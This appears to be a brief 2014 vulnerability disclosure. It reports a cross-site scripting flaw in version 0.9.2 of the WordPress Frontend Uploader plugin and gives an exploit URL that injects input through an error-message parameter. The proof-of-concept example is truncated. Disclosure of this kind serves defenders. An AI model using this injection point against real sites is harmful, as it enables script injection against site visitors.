WordPress Frontend Uploader Cross Site Scripting(XSS)

Posted by SECUPENT Research Center on Dec 27

Exploit Title: WordPress Frontend Uploader Cross Site Scripting(XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2

Exploit :

http://TARGET/[forntEndUploaderPage]=59&errors[fu-disallowed-mime-type][0][name]=XSS

Example(p0c):…

Leave a Reply